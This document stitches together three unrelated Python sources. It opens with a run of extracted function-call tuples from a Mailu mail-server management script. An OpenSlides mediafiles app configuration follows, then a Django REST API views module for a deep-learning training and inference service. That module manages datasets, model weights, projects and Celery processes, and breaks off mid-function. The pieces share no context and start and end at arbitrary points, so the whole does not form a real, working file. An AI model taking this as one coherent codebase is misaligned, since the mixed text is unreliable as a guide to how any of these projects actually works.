"mailu.db.sessi... | [((180, 216), 'mailu.admin.models.Domain.query.get', 'models.Domain.query.get', (['domain_name'], {}), '(domain_name)\n', (203, 216), False, 'from mailu.admin import models\n'), ((327, 393), 'mailu.admin.models.User', 'models.User', ([], {'localpart': 'localpart', 'domain': 'domain', 'global_admin': '(True)'}), '(localpart=localpart, domain=domain, global_admin=True)\n', (338, 393), False, 'from mailu.admin import models\n'), ((460, 480), 'mailu.db.session.add', 'db.session.add', (['user'], {}), '(user)\n', (474, 480), False, 'from mailu import app, manager, db\n'), ((485, 504), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (502, 504), False, 'from mailu import app, manager, db\n'), ((654, 690), 'mailu.admin.models.Domain.query.get', 'models.Domain.query.get', (['domain_name'], {}), '(domain_name)\n', (677, 690), False, 'from mailu.admin import models\n'), ((801, 868), 'mailu.admin.models.User', 'models.User', ([], {'localpart': 'localpart', 'domain': 'domain', 'global_admin': '(False)'}), '(localpart=localpart, domain=domain, global_admin=False)\n', (812, 868), False, 'from mailu.admin import models\n'), ((960, 980), 'mailu.db.session.add', 'db.session.add', (['user'], {}), '(user)\n', (974, 980), False, 'from mailu import app, manager, db\n'), ((985, 1004), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (1002, 1004), False, 'from mailu import app, manager, db\n'), ((1335, 1371), 'mailu.admin.models.Domain.query.get', 'models.Domain.query.get', (['domain_name'], {}), '(domain_name)\n', (1358, 1371), False, 'from mailu.admin import models\n'), ((1482, 1549), 'mailu.admin.models.User', 'models.User', ([], {'localpart': 'localpart', 'domain': 'domain', 'global_admin': '(False)'}), '(localpart=localpart, domain=domain, global_admin=False)\n', (1493, 1549), False, 'from mailu.admin import models\n'), ((1656, 1676), 'mailu.db.session.add', 'db.session.add', (['user'], {}), '(user)\n', (1670, 1676), False, 'from 
mailu import app, manager, db\n'), ((1681, 1700), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (1698, 1700), False, 'from mailu import app, manager, db\n'), ((1861, 1881), 'yaml.load', 'yaml.load', (['sys.stdin'], {}), '(sys.stdin)\n', (1870, 1881), False, 'import yaml, sys\n'), ((3925, 3944), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (3942, 3944), False, 'from mailu import app, manager, db\n'), ((4020, 4048), 'mailu.admin.models.User.query.get', 'models.User.query.get', (['email'], {}), '(email)\n', (4041, 4048), False, 'from mailu.admin import models\n'), ((4098, 4117), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (4115, 4117), False, 'from mailu import app, manager, db\n'), ((4196, 4225), 'mailu.admin.models.Alias.query.get', 'models.Alias.query.get', (['email'], {}), '(email)\n', (4218, 4225), False, 'from mailu.admin import models\n'), ((4277, 4296), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (4294, 4296), False, 'from mailu import app, manager, db\n'), ((4408, 4444), 'mailu.admin.models.Domain.query.get', 'models.Domain.query.get', (['domain_name'], {}), '(domain_name)\n', (4431, 4444), False, 'from mailu.admin import models\n'), ((4725, 4746), 'mailu.db.session.add', 'db.session.add', (['alias'], {}), '(alias)\n', (4739, 4746), False, 'from mailu import app, manager, db\n'), ((4751, 4770), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (4768, 4770), False, 'from mailu import app, manager, db\n'), ((4894, 4930), 'mailu.admin.models.Domain.query.get', 'models.Domain.query.get', (['domain_name'], {}), '(domain_name)\n', (4917, 4930), False, 'from mailu.admin import models\n'), ((5043, 5065), 'mailu.db.session.add', 'db.session.add', (['domain'], {}), '(domain)\n', (5057, 5065), False, 'from mailu import app, manager, db\n'), ((5068, 5087), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (5085, 5087), False, 'from mailu import app, 
manager, db\n'), ((5203, 5239), 'mailu.admin.models.Domain.query.get', 'models.Domain.query.get', (['domain_name'], {}), '(domain_name)\n', (5226, 5239), False, 'from mailu.admin import models\n'), ((5256, 5308), 'mailu.admin.models.User.query.get', 'models.User.query.get', (["(user_name + '@' + domain_name)"], {}), "(user_name + '@' + domain_name)\n", (5277, 5308), False, 'from mailu.admin import models\n'), ((5349, 5371), 'mailu.db.session.add', 'db.session.add', (['domain'], {}), '(domain)\n', (5363, 5371), False, 'from mailu import app, manager, db\n'), ((5374, 5393), 'mailu.db.session.commit', 'db.session.commit', ([], {}), '()\n', (5391, 5393), False, 'from mailu import app, manager, db\n'), ((5427, 5440), 'mailu.manager.run', 'manager.run', ([], {}), '()\n', (5438, 5440), False, 'from mailu import app, manager, db\n'), ((253, 284), 'mailu.admin.models.Domain', 'models.Domain', ([], {'name': 'domain_name'}), '(name=domain_name)\n', (266, 284), False, 'from mailu.admin import models\n'), ((293, 315), 'mailu.db.session.add', 'db.session.add', (['domain'], {}), '(domain)\n', (307, 315), False, 'from mailu import app, manager, db\n'), ((727, 758), 'mailu.admin.models.Domain', 'models.Domain', ([], {'name': 'domain_name'}), '(name=domain_name)\n', (740, 758), False, 'from mailu.admin import models\n'), ((767, 789), 'mailu.db.session.add', 'db.session.add', (['domain'], {}), '(domain)\n', (781, 789), False, 'from mailu import app, manager, db\n'), ((1408, 1439), 'mailu.admin.models.Domain', 'models.Domain', ([], {'name': 'domain_name'}), '(name=domain_name)\n', (1421, 1439), False, 'from mailu.admin import models\n'), ((1448, 1470), 'mailu.db.session.add', 'db.session.add', (['domain'], {}), '(domain)\n', (1462, 1470), False, 'from mailu import app, manager, db\n'), ((2189, 2225), 'mailu.admin.models.Domain.query.get', 'models.Domain.query.get', (['domain_name'], {}), '(domain_name)\n', (2212, 2225), False, 'from mailu.admin import models\n'), ((2406, 2434), 
'mailu.admin.models.User.query.get', 'models.User.query.get', (['email'], {}), '(email)\n', (2427, 2434), False, 'from mailu.admin import models\n'), ((2722, 2742), 'mailu.db.session.add', 'db.session.add', (['user'], {}), '(user)\n', (2736, 2742), False, 'from mailu import app, manager, db\n'), ((2989, 3025), 'mailu.admin.models.Domain.query.get', 'models.Domain.query.get', (['domain_name'], {}), '(domain_name)\n', (3012, 3025), False, 'from mailu.admin import models\n'), ((3207, 3236), 'mailu.admin.models.Alias.query.get', 'models.Alias.query.get', (['email'], {}), '(email)\n', (3229, 3236), False, 'from mailu.admin import models\n'), ((3567, 3588), 'mailu.db.session.add', 'db.session.add', (['alias'], {}), '(alias)\n', (3581, 3588), False, 'from mailu import app, manager, db\n'), ((4070, 4093), 'mailu.db.session.delete', 'db.session.delete', (['user'], {}), '(user)\n', (4087, 4093), False, 'from mailu import app, manager, db\n'), ((4248, 4272), 'mailu.db.session.delete', 'db.session.delete', (['alias'], {}), '(alias)\n', (4265, 4272), False, 'from mailu import app, manager, db\n'), ((4481, 4512), 'mailu.admin.models.Domain', 'models.Domain', ([], {'name': 'domain_name'}), '(name=domain_name)\n', (4494, 4512), False, 'from mailu.admin import models\n'), ((4521, 4543), 'mailu.db.session.add', 'db.session.add', (['domain'], {}), '(domain)\n', (4535, 4543), False, 'from mailu import app, manager, db\n'), ((2324, 2355), 'mailu.admin.models.Domain', 'models.Domain', ([], {'name': 'domain_name'}), '(name=domain_name)\n', (2337, 2355), False, 'from mailu.admin import models\n'), ((2368, 2390), 'mailu.db.session.add', 'db.session.add', (['domain'], {}), '(domain)\n', (2382, 2390), False, 'from mailu import app, manager, db\n'), ((2508, 2575), 'mailu.admin.models.User', 'models.User', ([], {'localpart': 'localpart', 'domain': 'domain', 'global_admin': '(False)'}), '(localpart=localpart, domain=domain, global_admin=False)\n', (2519, 2575), False, 'from mailu.admin import 
models\n'), ((3124, 3155), 'mailu.admin.models.Domain', 'models.Domain', ([], {'name': 'domain_name'}), '(name=domain_name)\n', (3137, 3155), False, 'from mailu.admin import models\n'), ((3168, 3190), 'mailu.db.session.add', 'db.session.add', (['domain'], {}), '(domain)\n', (3182, 3190), False, 'from mailu import app, manager, db\n'), ((3637, 3666), 'mailu.db.session.query', 'db.session.query', (['models.User'], {}), '(models.User)\n', (3653, 3666), False, 'from mailu import app, manager, db\n'), ((3742, 3765), 'mailu.db.session.delete', 'db.session.delete', (['user'], {}), '(user)\n', (3759, 3765), False, 'from mailu import app, manager, db\n'), ((3787, 3817), 'mailu.db.session.query', 'db.session.query', (['models.Alias'], {}), '(models.Alias)\n', (3803, 3817), False, 'from mailu import app, manager, db\n'), ((3896, 3920), 'mailu.db.session.delete', 'db.session.delete', (['alias'], {}), '(alias)\n', (3913, 3920), False, 'from mailu import app, manager, db\n')] |
from typing import Any, Dict, Set
from django.apps import AppConfig
class MediafilesAppConfig(AppConfig):
name = "openslides.mediafiles"
verbose_name = "OpenSlides Mediafiles"
angular_site_module = True
def ready(self):
# Import all required stuff.
from openslides.core.signals import permission_change
from openslides.utils.rest_api import router
from .projector import register_projector_elements
from .signals import get_permission_change_data
from .views import MediafileViewSet
from . import serializers # noqa
from ..utils.access_permissions import required_user
# Define projector elements.
register_projector_elements()
# Connect signals.
permission_change.connect(
get_permission_change_data,
dispatch_uid="mediafiles_get_permission_change_data",
)
# Register viewsets.
router.register(
self.get_model("Mediafile").get_collection_string(), MediafileViewSet
)
# register required_users
required_user.add_collection_string(
self.get_model("Mediafile").get_collection_string(), required_users
)
def get_startup_elements(self):
"""
Yields all Cachables required on startup i. e. opening the websocket
connection.
"""
yield self.get_model("Mediafile")
def required_users(element: Dict[str, Any]) -> Set[int]:
"""
Returns all user ids that are displayed as uploaders in any mediafile
if request_user can see mediafiles. This function may return an empty
set.
"""
return set(element["uploader_id"])
| [
"openslides.core.signals.permission_change.connect"
] | [((766, 878), 'openslides.core.signals.permission_change.connect', 'permission_change.connect', (['get_permission_change_data'], {'dispatch_uid': '"""mediafiles_get_permission_change_data"""'}), "(get_permission_change_data, dispatch_uid=\n 'mediafiles_get_permission_change_data')\n", (791, 878), False, 'from openslides.core.signals import permission_change\n')] |
import datetime
import os
import uuid
from os.path import join as opjoin
from pathlib import Path
import numpy as np
import requests
import yaml
from celery.result import AsyncResult
from django.db.models import Q
from drf_yasg import openapi
from drf_yasg.utils import swagger_auto_schema
from rest_framework import mixins, status, views, viewsets
from rest_framework.response import Response
from backend import celery_app, settings
from backend_app import mixins as BAMixins, models, serializers, swagger
from backend_app import utils
from deeplearning.tasks import classification, segmentation
from deeplearning.utils import nn_settings
class AllowedPropViewSet(BAMixins.ParamListModelMixin,
                         mixins.CreateModelMixin,
                         viewsets.GenericViewSet):
    # List/create the per-model overrides of a property's default and allowed values.
    queryset = models.AllowedProperty.objects.all()
    serializer_class = serializers.AllowedPropertySerializer
    params = ['model_id', 'property_id']

    def get_queryset(self):
        # Restrict the queryset to the (model, property) pair given in the query string.
        query = self.request.query_params
        self.queryset = models.AllowedProperty.objects.filter(
            model_id=query.get('model_id'),
            property_id=query.get('property_id'))
        return self.queryset

    @swagger_auto_schema(
        manual_parameters=[openapi.Parameter('model_id', openapi.IN_QUERY, "Integer representing a model",
                                             required=True, type=openapi.TYPE_INTEGER),
                           openapi.Parameter('property_id', openapi.IN_QUERY, "Integer representing a property",
                                             required=True, type=openapi.TYPE_INTEGER)]
    )
    def list(self, request, *args, **kwargs):
        """Return the allowed and default values of a property
        This method returns the values that a property can assume depending on the model employed. \
        It provides a default value and a comma separated list of values to choose from.
        When this api returns an empty list, the property allowed values and default should be retrieved \
        using the `/properties/{id}` API.
        """
        return super().list(request, *args, **kwargs)

    def create(self, request, *args, **kwargs):
        """Create a new AllowedProperty
        This method create a new AllowedProperty
        """
        return super().create(request, *args, **kwargs)
class DatasetViewSet(mixins.ListModelMixin,
                     mixins.RetrieveModelMixin,
                     mixins.CreateModelMixin,
                     viewsets.GenericViewSet):
    # Datasets usable for training/finetuning; auto-generated single-image
    # datasets (created by the single-image inference API) are hidden.
    queryset = models.Dataset.objects.filter(is_single_image=False)
    serializer_class = serializers.DatasetSerializer

    def get_queryset(self):
        # Optionally narrow the list to one task, still excluding single-image datasets.
        task_id = self.request.query_params.get('task_id')
        if task_id:
            self.queryset = models.Dataset.objects.filter(task_id=task_id, is_single_image=False)
        return self.queryset

    @swagger_auto_schema(
        manual_parameters=[openapi.Parameter('task_id', openapi.IN_QUERY, type=openapi.TYPE_INTEGER, required=False)]
    )
    def list(self, request, *args, **kwargs):
        """Get the list datasets to use for training or finetuning
        This method returns all the datasets in the backend.
        """
        return super().list(request, *args, **kwargs)

    def retrieve(self, request, *args, **kwargs):
        """Retrieve a single dataset
        This method returns the `{id}` dataset.
        """
        return super().retrieve(request, *args, **kwargs)

    @swagger_auto_schema(responses=swagger.DatasetViewSet_create_response)
    def create(self, request, *args, **kwargs):
        """Upload a new dataset downloading it from a URL
        This API uploads a dataset YAML file and stores it in the backend.
        The `path` field must contain the URL of a dataset, e.g. \
        [`dropbox.com/s/ul1yc8owj0hxpu6/isic_segmentation.yml`](https://www.dropbox.com/s/ul1yc8owj0hxpu6/isic_segmentation.yml?dl=1).
        """
        serializer = self.get_serializer(data=request.data)
        if not serializer.is_valid():
            return Response({'error': 'Validation error. Request data is malformed.'},
                            status=status.HTTP_400_BAD_REQUEST)

        url = serializer.validated_data['path']
        dataset_name = serializer.validated_data['name']
        dataset_out_path = f'{settings.DATASETS_DIR}/{dataset_name}.yml'
        if Path(dataset_out_path).exists():
            return Response({'error': f'The dataset `{dataset_name}` already exists'},
                            status=status.HTTP_400_BAD_REQUEST)

        # Download the yml file in url
        try:
            r = requests.get(url, allow_redirects=True)
        except requests.exceptions.RequestException:
            # URL malformed
            return Response({'error': 'URL malformed'}, status=status.HTTP_400_BAD_REQUEST)
        if r.status_code != 200:
            return Response({'error': 'URL malformed'}, status=status.HTTP_400_BAD_REQUEST)

        # safe_load: the content comes from an arbitrary user-supplied URL; never
        # allow construction of arbitrary Python objects from untrusted YAML.
        yaml_content = yaml.safe_load(r.content)
        with open(dataset_out_path, 'w') as f:
            yaml.dump(yaml_content, f, Dumper=utils.MyDumper, sort_keys=False)

        # Update the path
        serializer.save(path=dataset_out_path)
        headers = self.get_success_headers(serializer.data)
        return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
class InferenceViewSet(views.APIView):
    @swagger_auto_schema(request_body=serializers.InferenceSerializer,
                         responses=swagger.inferences_post_responses)
    def post(self, request):
        """Start an inference process using a pre-trained model on a dataset
        This is the main entry point to start the inference. \
        It is mandatory to specify a pre-trained model and a dataset.
        """
        serializer = serializers.InferenceSerializer(data=request.data)
        # Guard clause: reject malformed payloads, then delegate to the shared helper.
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        return utils.do_inference(serializer)
class InferenceSingleViewSet(views.APIView):
    @swagger_auto_schema(request_body=serializers.InferenceSingleSerializer,
                         responses=swagger.inferences_post_responses)
    def post(self, request):
        """Starts the inference providing an image URL
        This API allows the inference of a single image.
        It is mandatory to specify the same fields of `/inference` API, but for dataset_id which is replaced by \
        the url of the image to process.
        """
        serializer = serializers.InferenceSingleSerializer(data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

        image_url = serializer.validated_data['image_url']
        project_id = serializer.validated_data['project_id']
        task_id = models.Project.objects.get(id=project_id).task_id

        # Auto-generated, single-image dataset wrapping the given URL.
        # Built as a plain dict instead of interpolated YAML text, so URLs that
        # contain quotes, colons or newlines can neither break the document nor
        # inject extra YAML keys.
        yaml_content = {
            'name': image_url,
            'description': f'{image_url} auto-generated dataset',
            'images': [image_url],
            'split': {'test': [0]},
        }

        # Save dataset and get id (the id is needed to name the on-disk yml file)
        d = models.Dataset(name='single-image-dataset', task_id=task_id, path='', is_single_image=True)
        d.save()
        d.path = f'{settings.DATASETS_DIR}/single_image_dataset_{d.id}.yml'
        with open(d.path, 'w') as f:
            yaml.dump(yaml_content, f, Dumper=utils.MyDumper, sort_keys=False)
        d.save()

        serializer.validated_data['dataset_id'] = d
        return utils.do_inference(serializer)
class ModelViewSet(mixins.ListModelMixin,
                   viewsets.GenericViewSet):
    # Read-only listing of the Neural Network architectures known to the backend.
    queryset = models.Model.objects.all()
    serializer_class = serializers.ModelSerializer

    def get_queryset(self):
        # Optional `task_id` query parameter narrows the list to a single task.
        task_filter = self.request.query_params.get('task_id')
        if task_filter:
            self.queryset = models.Model.objects.filter(task_id=task_filter)
        return self.queryset

    @swagger_auto_schema(
        manual_parameters=[openapi.Parameter('task_id', openapi.IN_QUERY,
                                             "Integer for filtering the models based on task.",
                                             type=openapi.TYPE_INTEGER, required=False)]
    )
    def list(self, request):
        """Returns the available Neural Network models
        This API allows the client to know which Neural Network models are available in the system in order to allow \
        their selection.
        The optional `task_id` parameter is used to filter them based on the task the models are used for.
        """
        return super().list(request)
class ModelWeightsViewSet(BAMixins.ParamListModelMixin,
                          mixins.RetrieveModelMixin,
                          mixins.UpdateModelMixin,
                          viewsets.GenericViewSet):
    # List/retrieve/update trained weights of the Neural Network models.
    queryset = models.ModelWeights.objects.all()
    serializer_class = serializers.ModelWeightsSerializer
    params = ['model_id']

    def get_queryset(self):
        # Only the list action filters on model_id; detail/update actions see everything.
        if self.action == 'list':
            model_id = self.request.query_params.get('model_id')
            self.queryset = models.ModelWeights.objects.filter(model_id=model_id)
            return self.queryset
        else:
            return super(ModelWeightsViewSet, self).get_queryset()

    @swagger_auto_schema(
        manual_parameters=[openapi.Parameter('model_id', openapi.IN_QUERY,
                                             "Return the modelweights obtained on `model_id` model.",
                                             type=openapi.TYPE_INTEGER, required=False)]
    )
    def list(self, request):
        """Returns the available Neural Network models
        When 'use pre-trained' is selected, it is possible to query the backend passing a `model_id` to obtain a list
        of dataset on which it was pretrained.
        """
        return super().list(request)

    def retrieve(self, request, *args, **kwargs):
        """Retrieve a single modelweight
        This API returns the modelweight with the requested`{id}`.
        """
        return super().retrieve(request, *args, **kwargs)

    def get_obj(self, id):
        """Return the ModelWeights with primary key `id`, or None when it does not exist."""
        try:
            return models.ModelWeights.objects.get(id=id)
        except models.ModelWeights.DoesNotExist:
            return None

    def put(self, request, *args, **kwargs):
        """Update an existing weight
        This method updates an existing model weight (e.g. change the name).
        """
        # .get() instead of ['id']: a payload without `id` must answer 400, not crash
        # with a KeyError (500).
        weight_id = request.data.get('id')
        weight = self.get_obj(weight_id)
        if not weight:
            error = {"Error": f"Weight {weight_id} does not exist"}
            return Response(data=error, status=status.HTTP_400_BAD_REQUEST)

        serializer = self.serializer_class(weight, data=request.data)
        if serializer.is_valid():
            serializer.save()
            # Returns all the elements with model_id in request
            queryset = models.ModelWeights.objects.filter(model_id=weight.model_id)
            serializer = self.get_serializer(queryset, many=True)
            return Response(serializer.data)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def update(self, request, *args, **kwargs):
        """Update an existing weight
        This method updates an existing model weight (e.g. change the name).
        """
        return super().update(request, *args, **kwargs)

    @swagger_auto_schema(auto_schema=None)
    def partial_update(self, request, *args, **kwargs):
        # Hidden from the generated API docs; delegates to the default implementation.
        return super().partial_update(request, *args, **kwargs)
class OutputViewSet(views.APIView):
    @staticmethod
    def trunc(values, decs=0):
        """Truncate `values` (scalar or ndarray) to `decs` decimal places."""
        return np.trunc(values * 10 ** decs) / (10 ** decs)

    @swagger_auto_schema(
        manual_parameters=[openapi.Parameter('process_id', openapi.IN_QUERY,
                                             "Pass a required UUID representing a finished process.",
                                             type=openapi.TYPE_STRING, format=openapi.FORMAT_UUID, required=False)],
        responses=swagger.OutputViewSet_get_responses
    )
    def get(self, request, *args, **kwargs):
        """Retrieve results about an inference process
        This API provides information about an `inference` process.In classification task it returns the list \
        of images and an array composed of the classes prediction scores.
        In segmentation task it returns the URLs of the segmented images.
        """
        process_id = self.request.query_params.get('process_id')
        if not process_id:
            error = {'Error': 'Missing required parameter `process_id`'}
            return Response(data=error, status=status.HTTP_400_BAD_REQUEST)

        infer = models.Inference.objects.filter(celery_id=process_id)
        if not infer:
            # already deleted weight/training or inference
            return Response({"result": "Process stopped before finishing or non existing."},
                            status=status.HTTP_404_NOT_FOUND)

        if AsyncResult(process_id).status == 'PENDING':
            return Response({"result": "Process in execution. Try later for output results."},
                            status=status.HTTP_200_OK)

        infer = infer.first()
        output_path = opjoin(settings.OUTPUTS_DIR, infer.outputfile)
        if not os.path.exists(output_path):
            return Response({"result": "Output file not found"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)

        # `with` closes the handle deterministically (the previous version leaked it).
        with open(output_path, 'r') as outputs:
            raw_lines = outputs.read().splitlines()

        # Differentiate classification and segmentation
        if infer.modelweights_id.model_id.task_id.name.lower() == 'classification':
            # Each line is `<image>;<score>;...`; split into its fields.
            lines = [line.split(';') for line in raw_lines]
            # preds = self.trunc(preds, decs=8)
        else:
            # Segmentation: the output file holds paths of files; rewrite them as URLs.
            uri = request.build_absolute_uri(settings.MEDIA_URL)
            lines = [l.replace(settings.OUTPUTS_DIR, uri) for l in raw_lines]

        response = {'outputs': lines}
        return Response(response, status=status.HTTP_200_OK)
class ProjectViewSet(mixins.ListModelMixin,
                     mixins.RetrieveModelMixin,
                     mixins.CreateModelMixin,
                     mixins.UpdateModelMixin,
                     viewsets.GenericViewSet):
    # CRUD API over projects.
    queryset = models.Project.objects.all()
    serializer_class = serializers.ProjectSerializer

    def get_obj(self, id):
        """Return the Project with primary key `id`, or None when it does not exist."""
        try:
            return models.Project.objects.get(id=id)
        except models.Project.DoesNotExist:
            return None

    def list(self, request, *args, **kwargs):
        """Loads all the projects
        This method lists all the available projects.
        """
        return super().list(request, *args, **kwargs)

    def retrieve(self, request, *args, **kwargs):
        """Retrieve a single project
        Returns a project by `{id}`.
        """
        return super().retrieve(request, *args, **kwargs)

    @swagger_auto_schema(responses=swagger.ProjectViewSet_create_response)
    def create(self, request, *args, **kwargs):
        """Create a new project
        Create a new project.
        """
        return super().create(request, *args, **kwargs)

    def put(self, request, *args, **kwargs):
        # .get() instead of ['id']: a payload without `id` must answer 400, not crash
        # with a KeyError (500).
        project_id = request.data.get('id')
        project = self.get_obj(project_id)
        if not project:
            error = {"Error": f"Project {project_id} does not exist"}
            return Response(data=error, status=status.HTTP_400_BAD_REQUEST)

        serializer = serializers.ProjectSerializer(project, data=request.data)
        if serializer.is_valid():
            serializer.save()
            # Returns all the elements
            return self.list(request)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def update(self, request, *args, **kwargs):
        """Update an existing project
        Update a project instance by providing its `{id}`.
        """
        return super().update(request, *args, **kwargs)

    @swagger_auto_schema(auto_schema=None)
    def partial_update(self, request, *args, **kwargs):
        # Hidden from the generated API docs; delegates to the default implementation.
        return super().partial_update(request, *args, **kwargs)
class PropertyViewSet(mixins.ListModelMixin,
                      mixins.RetrieveModelMixin,
                      viewsets.GenericViewSet):
    # Read-only API over the globally supported training properties.
    queryset = models.Property.objects.all()
    serializer_class = serializers.PropertyListSerializer

    def get_queryset(self):
        raw_name = self.request.query_params.get('name')
        if raw_name:
            # Match the name both as given and with underscores mapped to spaces,
            # so e.g. `learning_rate` also finds "learning rate".
            spaced_name = raw_name.replace('_', ' ')
            self.queryset = models.Property.objects.filter(
                Q(name__icontains=raw_name) | Q(name__icontains=spaced_name))
        return self.queryset

    def list(self, request, *args, **kwargs):
        """Return the Properties supported by backend
        This API allows the client to know which properties are "globally" supported by the backend.
        A model can have different default value and allowed values if the `/allowedProperties` return an entry.
        """
        return super().list(request, *args, **kwargs)

    def retrieve(self, request, *args, **kwargs):
        """Retrieve a single property
        Return a property by `{id}`.
        """
        return super().retrieve(request, *args, **kwargs)
class StatusView(views.APIView):
    @swagger_auto_schema(manual_parameters=[openapi.Parameter('process_id', openapi.IN_QUERY,
                                                              "UUID representing a process",
                                                              required=True, type=openapi.TYPE_STRING,
                                                              format=openapi.FORMAT_UUID)],
                        responses=swagger.StatusView_get_response
                        )
    def get(self, request):
        """Return the status of an training or inference process
        This API allows the frontend to query the status of a training or inference, identified by a `process_id` \
        (which is returned by `/train` or `/inference` APIs).
        """
        process_id = self.request.query_params.get('process_id')
        if not process_id:
            error = {'Error': 'Missing required parameter `process_id`'}
            return Response(data=error, status=status.HTTP_400_BAD_REQUEST)

        # A process id identifies either a training (ModelWeights) or an inference run.
        if models.ModelWeights.objects.filter(celery_id=process_id).exists():
            process_type = 'training'
            process = models.ModelWeights.objects.filter(celery_id=process_id).first()
        elif models.Inference.objects.filter(celery_id=process_id).exists():
            process_type = 'inference'
            process = models.Inference.objects.filter(celery_id=process_id).first()
        else:
            res = {
                "result": "error",
                "error": "Process not found."
            }
            return Response(data=res, status=status.HTTP_404_NOT_FOUND)

        try:
            with open(process.logfile, 'r') as f:
                lines = f.read().splitlines()
                last_line = lines[-1]
        except (OSError, IndexError):
            # OSError: log file missing/unreadable. IndexError: log file still empty.
            # The narrowed clause replaces a bare `except:`, which also swallowed
            # unrelated exceptions such as KeyboardInterrupt.
            res = {
                "result": "error",
                "error": "Log file not found"
            }
            return Response(data=res, status=status.HTTP_500_INTERNAL_SERVER_ERROR)

        # The worker appends a `<done>` marker on completion; the real last data
        # line is then the one before it.
        if last_line == '<done>':
            process_status = 'finished'
            last_line = lines[-2]
        else:
            process_status = 'running'

        res = {
            'result': 'ok',
            'status': {
                'process_type': process_type,
                'process_status': process_status,
                'process_data': last_line,
            }
        }
        return Response(data=res, status=status.HTTP_200_OK)
class StopProcessViewSet(views.APIView):
    @swagger_auto_schema(request_body=serializers.StopProcessSerializer,
                        responses=swagger.StopProcessViewSet_post_response
                        )
    def post(self, request):
        """Kill a training or inference process
        Stop a training process specifying a `process_id` (which is returned by `/train` or `/inference` APIs).
        """
        serializer = serializers.StopProcessSerializer(data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

        process_id = serializer.data['process_id']
        weights = models.ModelWeights.objects.filter(celery_id=process_id)
        infer = models.Inference.objects.filter(celery_id=process_id)
        if not weights.exists() and not infer.exists():
            # already deleted weight/training or inference
            return Response({"result": "Process already stopped or non existing"}, status=status.HTTP_404_NOT_FOUND)

        # Pick whichever record matched; trainings take precedence, as before.
        if weights.exists():
            entry = weights.first()
            response = {"result": "Training stopped"}
        else:
            entry = infer.first()
            response = {"result": "Inference stopped"}

        celery_app.control.revoke(entry.celery_id, terminate=True, signal='SIGUSR1')
        # delete the ModelWeights/Inference entry from db
        # (for trainings this also deletes the ModelWeights fk in project)
        entry.delete()
        # todo delete log file? delete weight file?
        return Response(response, status=status.HTTP_200_OK)
class TaskViewSet(mixins.ListModelMixin,
                  viewsets.GenericViewSet):
    # Read-only listing of the tasks (e.g. classification, segmentation) known to the backend.
    queryset = models.Task.objects.all()
    serializer_class = serializers.TaskSerializer

    def list(self, request, *args, **kwargs):
        """Return the tasks supported by backend
        This API allows the client to know which task this platform supports. e.g. classification or segmentation tasks.
        """
        return super(TaskViewSet, self).list(request, *args, **kwargs)
class TrainViewSet(views.APIView):
    # POST /train: validates the request, creates a ModelWeights row, resolves
    # the hyperparameters and dispatches a Celery training task.
    @swagger_auto_schema(request_body=serializers.TrainSerializer,
                         responses=swagger.TrainViewSet_post_response
                         )
    def post(self, request):
        """Starts the training of a (possibly pre-trained) model on a dataset
        This is the main entry point to start the training of a model on a dataset. \
        It is mandatory to specify a model to be trained and a dataset.
        When providing a `weights_id`, the training starts from the pre-trained model.
        """
        serializer = serializers.TrainSerializer(data=request.data)
        if serializer.is_valid():
            # Create a new modelweights and start training
            weight = models.ModelWeights()
            weight.dataset_id_id = serializer.data['dataset_id']
            weight.model_id_id = serializer.data['model_id']
            # Validate the referenced rows up front; single-image datasets are
            # excluded (the filter requires is_single_image=False).
            if not models.Dataset.objects.filter(id=weight.dataset_id_id, is_single_image=False).exists():
                error = {"Error": f"Dataset with id `{weight.dataset_id_id}` does not exist"}
                return Response(error, status=status.HTTP_400_BAD_REQUEST)
            if not models.Model.objects.filter(id=weight.model_id_id).exists():
                error = {"Error": f"Model with id `{weight.model_id_id}` does not exist"}
                return Response(error, status=status.HTTP_400_BAD_REQUEST)
            if not models.Project.objects.filter(id=serializer.data['project_id']).exists():
                error = {"Error": f"Project with id `{serializer.data['project_id']}` does not exist"}
                return Response(error, status=status.HTTP_400_BAD_REQUEST)

            # Check if dataset and model are both for same task
            if weight.model_id.task_id != weight.dataset_id.task_id:
                error = {"Error": f"Model and dataset must belong to the same task"}
                return Response(error, status=status.HTTP_400_BAD_REQUEST)

            project = models.Project.objects.get(id=serializer.data['project_id'])
            # task_name selects the Celery task to launch further below
            task_name = project.task_id.name.lower()
            weight.task_id = project.task_id
            # Human-readable name: <model>_<dataset>_<timestamp>
            weight.name = f'{weight.model_id.name}_{weight.dataset_id.name}_' \
                          f'{datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S")}'

            if serializer.data['weights_id']:
                # Optional fine-tuning: start from an existing pre-trained weight
                weight.pretrained_on_id = serializer.data['weights_id']
                if not models.ModelWeights.objects.filter(id=weight.pretrained_on_id).exists():
                    error = {"Error": f"Model weight with id `{weight.pretrained_on_id}` does not exist"}
                    return Response(error, status=status.HTTP_400_BAD_REQUEST)

            weight.save()  # Generate an id for the weight
            ckpts_dir = opjoin(settings.TRAINING_DIR, 'ckpts')
            # Checkpoint file is named after the newly generated weight id
            weight.location = Path(opjoin(ckpts_dir, f'{weight.id}.bin')).absolute()

            # Create a logfile
            weight.logfile = models.generate_file_path(f'{uuid.uuid4().hex}.log', settings.TRAINING_DIR, 'logs')
            weight.save()

            hyperparams = {}

            # Check if current model has some custom properties and load them
            props_allowed = models.AllowedProperty.objects.filter(model_id=weight.model_id_id)
            if props_allowed:
                for p in props_allowed:
                    hyperparams[p.property_id.name] = p.default_value

            # Load default values for those properties not in props_allowed
            props_general = models.Property.objects.all()
            for p in props_general:
                if hyperparams.get(p.name) is None:
